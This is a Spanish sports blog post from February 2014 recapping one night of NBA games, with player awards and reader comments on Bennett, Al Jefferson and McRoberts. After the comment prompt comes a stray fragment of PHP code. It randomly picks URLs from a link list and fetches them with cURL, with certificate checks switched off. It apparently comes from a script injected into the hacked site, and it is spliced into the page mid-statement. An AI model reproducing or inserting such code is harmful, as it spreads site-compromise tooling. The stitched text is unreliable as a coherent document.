La Crónica: Lebron vs Durant (a distancia)

12 de February de 2014 por TheDeerHunter

Lo de Durant empieza a ser escandaloso. 36 puntitos y 10 rebotes… Quizá no tuvo tanta fortuna en su rencietnemente estrenada faceta de gran distribuidor como otros días pero sus 8 pérdidas no le impidieron vencer a un rival de entidad como los Blazers en el Rose Garden Moda Center de Portland (98-95). Suponemos que una situación así empieza a  escocer en el ego del mejor jugador del mundo. Le pilló en momento de pura furia para mejorar la sobresaliente actuación de su rival e imponerse a los Suns (103-97). Menuda máquina.

Por parte de los Grizzlies, importante victoria en casa ante un rival serio como son los Wizards. Sin Conley (pero con Calathes) y a pesar de jugar contra un Breadley Beal en estado de gracia (89-92). Los Bulls también ganaron ante Hawks con Gibson de primera espada y Noah firmando triple-doble (85-100). En cambio, los Lakers firmaron una de sus peores pájaras ente Utah. La peor marca en un segundo cuarto de los úlimos 15 años detoda la competición (10 puntos). Por supuesto, les supuso la derrota (96-79).

Igual de significativa fue la derrota de los Mavs en Charlotte teniendo en cuenta la comprometida situación cara a playoffs de ambos. Dirk Nowitzki se tuvo que retirar lesionado durante el segundo cuarto pero volvió tras el descanso. Ya era tarde, los Bobcats habían conseguido una interesante ventaja y movían el balón como los ángeles (89-114). Por último, buena imagen de los Cavs ante los Kings y, oh sorpresa, primer doble-doble profesional de Bennett (99-109). 

PREMIOS

MVP: En el descanso, los Heat perdían y Lebron James no estaba jugando un gran partido pero en la reanudación todo cambió. Los 25 puntos que anotó en la 2ª parte son su récord de esta temporada. Acabó el encuentro con 37 puntos, 9 rebotes y 5 robos. Joakim Noah consiguió el 4º triple doble de su carrera ante los Hawks: 19 puntos, 16 rebotes y 11 asistencias. Por si fuera poco aún tuvo tiempo de poner 3 tapones.

Rookie: Enorme rendimiento el que está aportando Nick Calathes en sustitución de Mike Conley. El base griego de los Grizzlies terminó el partido con 18 puntos, 7 rebotes, 6 asistencias y 2 robos y le amargó la noche a John Wall. Tampoco vamos a dejar de destacar el primer doble-doble en la carrera de Anthony Bennett. En 30 minutos anotó 19 puntos y cogió 10 rebotes. Poco a poco parece que se está quitando la presión de encima. CJ McCollum anotó 15 puntos y robó 2 balones.

Sorpresa: Aparte de la de Calathes, podríamos hablar de los 25 puntos, 14 rebotes, 4 asistencias y 3 tapones de Chris Kaman, el único Laker que dio la cara ante los Jazz. Jeremy Lamb fue clave en la victoria de los Thunder con 19 puntos (8 de 11). Josh McRoberts acabó el partido con 9 puntos y 13 asistencias. Habéis leído bien, asistencias no rebotes. Su compañero Anthony Tolliver anotó 22 puntos.

Decepción: Terrible noche de dos cracks como Lamarcus Aldridge y John Wall. El de los Blazers acabó con un doble-doble pero necesitó 22 tiros para anotar solo 12 puntos. Por su parte, el de los Wizards se quedó en unos míseros 5 puntos.

Esfuerzo en vano: Bradley Beal anotó 37 puntos pero estuvo demasiado solo en Memphis.

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Esteban dice:
    #1

    eu deer, podrían poner alguna vez como MVP Al Jefferson, q tiene que hacer este tio para tener reconocimiento? los últimos 10 juegos según ESPN esta promediando 27 puntos, ayer fueron 30 contra un rival teóricamente muy superior

    tercer partido bastante seguido a un nivel mas que respetable de BENNETT, como dije, o Brown lo pone de titular y le deja jugar sin presión y permitiendole errores, o mi querido Brown debes irte a tu casa

      Citar

  2. rumbero dice:
    #2

    Esteban:
    eu deer, podrían poner alguna vez como MVPAl Jefferson, q tiene que hacer este tio para tener reconocimiento? los últimos 10 juegos según ESPN esta promediando 27 puntos, ayer fueron 30 contra un rival teóricamente muy superior

    En la crónica del miércoles pasado tiene un MVP por su partido contra GSW y si los fines de semana se dieran premios seguro tendría uno por el 40-18 contra Lakers. Hoy con Durant y Lebron y el triple doble de Noah no tiene cabida creo yo. No he visto el partido de Jefferson pero el del francés fue simplemente brutal, con un 6-6-6 en el primer cuarto y haciendo absolutamente todo. La verdad es que fue una masacre en los tableros. 57 rebotes para Chicago, 28 para Hawks.

      Citar

  3. arivas dice:
    #3

    Bennett ya parece un jugador digno, esta claro que llego muy mal al inicio de liga, pero ahora pesa menos y se le nota mas agil y evidentmente parece que tiene mas confianza en su tiro y sus desastroso porcentajes del inicio han mejorado. Espero que tengan confianza en el y se pueda ver si realmente es una eleccion tan mala o no. Creo que ayer fue su tercer partido de mas de 25min.

      Citar

  4. Denise dice:
    #4

    McRoberts 13 asistencias. ¿Puede ser el mayor número de asistencias dadas en un partido por un jugador interior en los últimos años?
    Quizas me columpio, pero no recuerdo ninguno ahora mismo.

      Citar

  5. TheDeerHunter dice:
    #5

    Esteban:
    eu deer, podrían poner alguna vez como MVPAl Jefferson, q tiene que hacer este tio para tener reconocimiento? los últimos 10 juegos según ESPN esta promediando 27 puntos, ayer fueron 30 contra un rival teóricamente muy superior

    A mí no me mires. Lo tengo en mi punto de mira desde hace semanas. Lo puse en mi selección para el all-star y puedes leer lo que pienso de él.
    De todas formas creo que hoy tenía extrema competencia. No creo que esté entre los tres mejores de la jornada.

      Citar

  6. txusma dice:
    #6

    Denise:
    McRoberts 13 asistencias. ¿Puede ser el mayor número de asistencias dadas en un partidopor un jugador interior en los últimos años?
    Quizas me columpio, pero no recuerdo ninguno ahora mismo.

    Pues Drew Gooden repartió tb 13 asistencias en 2012, tu amigo Andray Blatche tb llegó a 13 en 2010. El récord debe ser de Diaw q llegó a las 16 en 2006

      Citar

  7. Denise dice:
    #7

    txusma: Pues Drew Gooden repartió tb 13 asistencias en 2012, tu amigo Andray Blatche tb llegó a 13 en 2010. El récord debe ser de Diaw q llegó a las 16 en 2006

    Gran dato. Gracias

    Bueno, una semana para el Deadline, momento del año para mi tan emocionante como la propia final de liga, pero de momento muy parada la cosa. A ver si de hace lo de Gasol con algun equipo y eso genera un efecto dominó.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>